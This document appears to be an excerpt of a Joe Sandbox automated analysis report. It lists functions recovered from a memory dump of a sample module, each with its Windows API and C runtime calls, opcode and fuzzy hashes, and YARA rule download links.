Opcode ID: 1ce7dad60e412e6efbc3dd1ee285fc734308fd9ac0b9d59b644046027df3a81a
Instruction ID: 67e4873c250c1f595b17f98bc5861b69d535dad287217d9af4c5e65da92ffedf
Opcode Fuzzy Hash: 1ce7dad60e412e6efbc3dd1ee285fc734308fd9ac0b9d59b644046027df3a81a
Instruction Fuzzy Hash: FD0184FA90571967CB10EF648C88DDF7BEDEF46354F10446AEA15D3241EA34EA1887A0

Function 6FE2C113 Relevance: 7.5, APIs: 5, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsFree.KERNEL32(?,?,?,6FE2C179), ref: 6FE2C13B
GlobalHandle.KERNEL32(?), ref: 6FE2C149
GlobalUnlock.KERNEL32(00000000), ref: 6FE2C152
GlobalFree.KERNEL32(00000000), ref: 6FE2C159
DeleteCriticalSection.KERNEL32(?,?,?,6FE2C179), ref: 6FE2C163

Part of subcall function 6FE2BF5D: EnterCriticalSection.KERNEL32(?), ref: 6FE2BFBC
Part of subcall function 6FE2BF5D: LeaveCriticalSection.KERNEL32(?), ref: 6FE2BFCC
Part of subcall function 6FE2BF5D: LocalFree.KERNEL32(?), ref: 6FE2BFD5
Part of subcall function 6FE2BF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6FE2BFE7

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
String ID:
API String ID: 1549993015-0
Opcode ID: 4ecf531a3e9c94343b7fbf4e2e6bf09df1cef6f3a27e675ffbfdf1b9e553c1a6
Instruction ID: 20cb25175316705a7009220f1d2d1cb57875a5f276f03729e5a9427ea99ab545
Opcode Fuzzy Hash: 4ecf531a3e9c94343b7fbf4e2e6bf09df1cef6f3a27e675ffbfdf1b9e553c1a6
Instruction Fuzzy Hash: AFF03036704A109BDA106B3C9C48E5A3FF9AFC6674B25061EF565D7340DB30E9178BA4

Function 6FE3FA07 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 6FE3FA29
__calloc_crt.LIBCMT ref: 6FE3FA42

Strings

}o, xrefs: 6FE3FA59
$o, xrefs: 6FE3FA6E

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: __calloc_crt
String ID: $o$ }o
API String ID: 3494438863-763987776
Opcode ID: 45c527bf59c732ed806cc9d52e6ac328cc2c7283a2575d5b8d91142c8cb301f8
Instruction ID: 9297f9e70e227851a4177e394bde870459dc0cb162b5e1aa20b300b3f5f06b35
Opcode Fuzzy Hash: 45c527bf59c732ed806cc9d52e6ac328cc2c7283a2575d5b8d91142c8cb301f8
Instruction Fuzzy Hash: 9D11C433B586655AEB0CC92DAC446613FE5AF87738B35422AE115CE380E739D8A18244

Function 6FE3C7C3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6FE3C7D6

Part of subcall function 6FE3C731: ___BuildCatchObjectHelper.LIBCMT ref: 6FE3C767

_UnwindNestedFrames.LIBCMT ref: 6FE3C7ED
___FrameUnwindToState.LIBCMT ref: 6FE3C7FB

Strings

csm, xrefs: 6FE3C7D2, 6FE3C7E7, 6FE3C7FA, 6FE3C818, 6FE3C828

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
Instruction ID: 8237ebe18a3a16eef7a8d659115c89cab8b66e68290a06dfd3e9d0fcc92f85ab
Opcode Fuzzy Hash: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
Instruction Fuzzy Hash: A4014632901229BBDF125F64CC48EEA3FAAFF48358F204015FC1814160D732E9B1EBA1

Function 6FE3ED77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,6FE377D7), ref: 6FE3ED7C
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6FE3ED8C

Strings

IsProcessorFeaturePresent, xrefs: 6FE3ED86
KERNEL32, xrefs: 6FE3ED77

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 05e0d11d65f7875771f62e99e2de6f8a1cf327d980164b0412c2dad1008b6b50
Instruction ID: b7aeb5e6aefbbc2bb4e4841537f18ed2c397cd91df62c0a12de7c0a14b50776b
Opcode Fuzzy Hash: 05e0d11d65f7875771f62e99e2de6f8a1cf327d980164b0412c2dad1008b6b50
Instruction Fuzzy Hash: 94F09031940E09D2EF002FB1AD0D2AF7F79BB82756F920899E192A0584CF3094B9D385

Function 6FE4053C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

___addlocaleref.LIBCMT ref: 6FE4054E

Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(6FE4C168), ref: 6FE40426
Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(00000000), ref: 6FE40433
Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(00000048), ref: 6FE40440
Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(C0590000), ref: 6FE4044D
Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(00000000), ref: 6FE4045A
Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(00000000), ref: 6FE40476
Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(6FE23790), ref: 6FE40486
Part of subcall function 6FE40414: InterlockedIncrement.KERNEL32(-000000B4), ref: 6FE4049C

___removelocaleref.LIBCMT ref: 6FE40559

Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(6FE4095F), ref: 6FE404BD
Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(0FFFFF7C), ref: 6FE404CA
Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(558AF44D), ref: 6FE404D7
Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(8B0C45B6), ref: 6FE404E4
Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(831E751D), ref: 6FE404F1
Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(831E751D), ref: 6FE4050D
Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(5E166AFF), ref: 6FE4051D
Part of subcall function 6FE404A3: InterlockedDecrement.KERNEL32(45234050), ref: 6FE40533

___freetlocinfo.LIBCMT ref: 6FE4056D

Part of subcall function 6FE402CB: ___free_lconv_mon.LIBCMT ref: 6FE40311
Part of subcall function 6FE402CB: ___free_lconv_num.LIBCMT ref: 6FE40332
Part of subcall function 6FE402CB: ___free_lc_time.LIBCMT ref: 6FE403B7

Strings

P)o, xrefs: 6FE40564

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
String ID: P)o
API String ID: 467427115-3185942622
Opcode ID: 1da9b296e53a0e2b3653e30566cbd7932ea7bb139107a402692f62af805f4ed5
Instruction ID: 40b8c99438ad5c1dac40b2acb52c7f4a5a7629892c06e5761522ba5870bebd47
Opcode Fuzzy Hash: 1da9b296e53a0e2b3653e30566cbd7932ea7bb139107a402692f62af805f4ed5
Instruction Fuzzy Hash: 2EE04832901921458B33192874106E95E54EFE1639F31217FE670A7394DB28AA416099

Function 6FE27D71 Relevance: 6.1, APIs: 4, Instructions: 131timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6FE27D88
GetFileTime.KERNEL32(?,?,?,?), ref: 6FE27DBF
GetFileSizeEx.KERNEL32(?,?), ref: 6FE27DD7

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: File$SizeTime_memset
String ID:
API String ID: 151880914-0
Opcode ID: 5a1ad17a43a58817871abb52d2ee8099d5c5f955459e531afc36fe16550cb373
Instruction ID: b80f78db319817b744eeb8e9cd8536904081dc37a193950c01d705c90d5c0418
Opcode Fuzzy Hash: 5a1ad17a43a58817871abb52d2ee8099d5c5f955459e531afc36fe16550cb373
Instruction Fuzzy Hash: 80510B765047059FDB20DF68C9419AABBF8FF09324B204A2EE4A6D3690E734F945CB60

Function 6FE4081B Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6FE4084F
__isleadbyte_l.LIBCMT ref: 6FE40883
MultiByteToWideChar.KERNEL32(00000080,00000009,6FE340D8,6FE4BF84,00000000,00000000,?,?,?,?,6FE340D8,00000000,?), ref: 6FE408B4
MultiByteToWideChar.KERNEL32(00000080,00000009,6FE340D8,00000001,00000000,00000000,?,?,?,?,6FE340D8,00000000,?), ref: 6FE40922

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 6c2d4c45d7c9ed5736aa65c9f3a23f6bd79903b6df5ed1f12244550f0f93592b
Instruction ID: 17a62a6edb3bf4a12a512c868a0c3f59729f83752cce13b4325bc14fe0107cc2
Opcode Fuzzy Hash: 6c2d4c45d7c9ed5736aa65c9f3a23f6bd79903b6df5ed1f12244550f0f93592b
Instruction Fuzzy Hash: 47311631904245EFDB00DF64E9809AE7FB5FF55324F21457EE6649B291E330E941DB90

Function 6FE2C4CF Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

__msize.LIBCMT ref: 6FE2C562
__msize.LIBCMT ref: 6FE2C585
_malloc.LIBCMT ref: 6FE2C59D
_malloc.LIBCMT ref: 6FE2C5B2

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: eb3e2951c29db2cb9528be8e25198baf33442950c28f2f23aac9eb8d56726605
Instruction ID: 92e8eae19c24cbccf7cea34e0079fff3ac17780f3d3f6e8d1bf7231b326cf7c2
Opcode Fuzzy Hash: eb3e2951c29db2cb9528be8e25198baf33442950c28f2f23aac9eb8d56726605
Instruction Fuzzy Hash: 45216671640B109FDB159F3CD48499A7FE5AF44778B30891FD8298B294FB70E891CA84

Function 6FE28EC9 Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6FE28ED0

Part of subcall function 6FE29C7C: __EH_prolog3.LIBCMT ref: 6FE29C83

__wcsdup.LIBCMT ref: 6FE28EF2
GetCurrentThread.KERNEL32 ref: 6FE28F1F
GetCurrentThreadId.KERNEL32 ref: 6FE28F28

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__wcsdup
String ID:
API String ID: 190065205-0
Opcode ID: 85066225f549823919afc7f3f0d892077d0424132788612a511ae7c2fcca1835
Instruction ID: fa76569da06a6e69e67931218bc6b270dc00e26f59999577504663b1d9f8505f
Opcode Fuzzy Hash: 85066225f549823919afc7f3f0d892077d0424132788612a511ae7c2fcca1835
Instruction Fuzzy Hash: DD2179B0904B548ED7219F6A854524AFFE8BFA4704F20891FD1AA87B61EBB0A245CF41

Function 6FE31D07 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FE31D33
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6FE31D5E
GetCapture.USER32 ref: 6FE31D70
SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6FE31D7F

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: 6d47f7f521c493ecf6c17507a866533847f28e7d5b6db2fb7dbb1d0b9fc5e8b6
Instruction ID: 75a0c167743c4eafdb0c7190b7c4e74027d18ff3f79c2ad3a3d15d13a812a305
Opcode Fuzzy Hash: 6d47f7f521c493ecf6c17507a866533847f28e7d5b6db2fb7dbb1d0b9fc5e8b6
Instruction Fuzzy Hash: 390175327402947BDE305BA28CCCFEB3E79DFCAB15F21007CB6049A1E6CA918400D620

Function 6FE26A83 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6FE26A8A

Part of subcall function 6FE268E2: _malloc.LIBCMT ref: 6FE26900

__CxxThrowException@8.LIBCMT ref: 6FE26AC0
FormatMessageW.KERNEL32(00001100,00000000,6FE4C050,00000800,000000FF,00000000,00000000,?,?,6FE4D898,00000004,6FE216A6,?,6FE2155A,8007000E,6FE213DE), ref: 6FE26AEA
LocalFree.KERNEL32(000000FF,000000FF,6FE2279F), ref: 6FE26B12

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
String ID:
API String ID: 1776251131-0
Opcode ID: 13854e6d0d9f848f673a66acc8e51b97a691111cae04d845a04246301de436d2
Instruction ID: 1e22f2720480bb254be54d7e116bf62e881f3c358fc1fbed0adb2353e5bbad6a
Opcode Fuzzy Hash: 13854e6d0d9f848f673a66acc8e51b97a691111cae04d845a04246301de436d2
Instruction Fuzzy Hash: 67114C71604349AFDF049F68CC449A93FF5EF8A714F30C62DF5258A2E0E7319A519B54

Function 6FE2D159 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6FE2D194
RegCloseKey.ADVAPI32(00000000), ref: 6FE2D19D
swprintf.LIBCMT ref: 6FE2D1BA
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6FE2D1CB

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: 284390bef0d408fa35b0d68007ff830028bf60f91674a181b7a8d44189fe700f
Instruction ID: aa9890ff741d6c3907858d4d4517f27dc9e4efa5a2a8512af6b23311208321e4
Opcode Fuzzy Hash: 284390bef0d408fa35b0d68007ff830028bf60f91674a181b7a8d44189fe700f
Instruction Fuzzy Hash: 3401C876500709BBDB10AF648C45FAF7BEDAF4A714F10041AFA00A7280DB75ED15C7A0

Function 6FE27287 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6FE268E2: _malloc.LIBCMT ref: 6FE26900

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6FE272BB
GetCurrentProcess.KERNEL32(?,00000000), ref: 6FE272C1
DuplicateHandle.KERNEL32(00000000), ref: 6FE272C4
GetLastError.KERNEL32(?), ref: 6FE272DF

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: b5cdc3edd32dbb16e172e7c09fad5c26c50e0ecd55291a8e80d9cf33d0ba539a
Instruction ID: f031afc4f5a7a1d5afe00621b21706bb5aeac44dce62b7d909db7e0027a5722f
Opcode Fuzzy Hash: b5cdc3edd32dbb16e172e7c09fad5c26c50e0ecd55291a8e80d9cf33d0ba539a
Instruction Fuzzy Hash: 3C014472600605ABDB009BA5CD89F5A7FE9EFC5764F244519F505DB280EB71ED018BA0

Function 6FE30F8D Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 6FE30F9D
GetTopWindow.USER32(00000000), ref: 6FE30FDC
GetWindow.USER32(00000000,00000002), ref: 6FE30FFA

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 32d9cd91f0b138aaca8306c8d0b6ae205f60c4a658d48b7668b0a8322b07bfda
Instruction ID: b1d4e8483006ef8982a1a4fae855cb7b1f63c3757affddcfda7371601c4db787
Opcode Fuzzy Hash: 32d9cd91f0b138aaca8306c8d0b6ae205f60c4a658d48b7668b0a8322b07bfda
Instruction Fuzzy Hash: 9801293340862ABBCF026E958C0CEEF3F26AF4A7A8F154025FA1055160C736C572EBA1

Function 6FE3EC63 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6FE3EC89

Part of subcall function 6FE3EAAE: __fltout2.LIBCMT ref: 6FE3EADA

__cftog_l.LIBCMT ref: 6FE3ECAF
__cftoe_l.LIBCMT ref: 6FE3ECE1

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: c142487e8c4ec9899bd0547f19d92bd9afeca5afd6d7e87dd131cfa6ce6bee21
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: 1A11837380069EBBCF125F84CD05CDD3F62BB48358B258415FA2858170C732DAB6EB82

Function 6FE303CF Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 6FE303DC
GetTopWindow.USER32(00000000), ref: 6FE303EF

Part of subcall function 6FE303CF: GetWindow.USER32(00000000,00000002), ref: 6FE30436

GetTopWindow.USER32(?), ref: 6FE3041F

Memory Dump Source

Source File: 0000000C.00000002.1400813017.000000006FE21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE20000, based on PE: true

Associated: 0000000C.00000002.1400776797.000000006FE20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE51000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401004649.000000006FE55000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1401063050.000000006FE59000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6fe20000_DZIPR.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 700a9ba022c2d07b05953a95c950249fe136d69bb7e3227b9aa18fed98f3c044
Instruction ID: c751168d5c98641c5149c2a7dd66ba597997ba06d7a9b767be9da0aec4013e67
Opcode Fuzzy Hash: 700a9ba022c2d07b05953a95c950249fe136d69bb7e3227b9aa18fed98f3c044
